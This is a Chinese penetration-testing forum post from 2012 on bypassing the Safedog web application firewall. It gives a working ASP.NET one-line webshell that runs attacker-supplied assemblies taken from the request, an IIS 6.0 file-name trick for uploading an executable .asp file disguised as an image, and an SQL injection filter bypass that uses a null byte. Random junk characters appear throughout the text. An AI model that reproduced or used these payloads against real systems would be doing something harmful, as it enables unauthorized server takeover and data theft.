中国网络渗透测试联盟

标题: 突破安全狗防注入及上传的一些思路 [打印本页]
作者: admin    时间: 2012-10-31 08:25
标题: 突破安全狗防注入及上传的一些思路
1、绕过IIS安全狗的一句话。
: w7 b3 n$ T( \% L0 P4 Y2 i' i前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。8 K9 _: y, O( S- V
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
5 Z  o( m' F; Q% n/ T0 \
- S% e. W: o* G& ?3 z* ?- t, x2、IIS6.0解析漏洞遇到安全狗。2 b2 w% E" j' h0 ?+ c2 c
文件名为
/ F+ b% z4 Q) e2 whttp://www.xxxxx.com/sh3llc0de.asp;1.jpg# i) P8 [' Z+ }9 I
& k; ^) e# w3 \& n+ e$ A1 ^; G) v
这样的会被IIS安全狗果断屏蔽。
) K- a: }4 c4 R4 S  u7 ?改成如下名称,IIS6一样会解析:8 o7 y% \" J& M
www.xxxxx.com/;1.asp;1.jpg+ W0 [& V0 j% ]* c8 ]

/ ~; k( M' Z' W( O4 w3、安全狗的注入绕过。
* ~/ u0 t  `) C# U) M常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。# Q; ?+ V" h3 I
但如果:  g, a3 J" r) @8 a
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=13 `6 x' r2 G$ i! ?/ c
就可以成功绕过了。
" M; C; O  u* W# X/ \7 ~6 e8 {& |9 j0 R- A2 G9 }5 u

/ C+ C  P+ P/ c# ]8 g



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2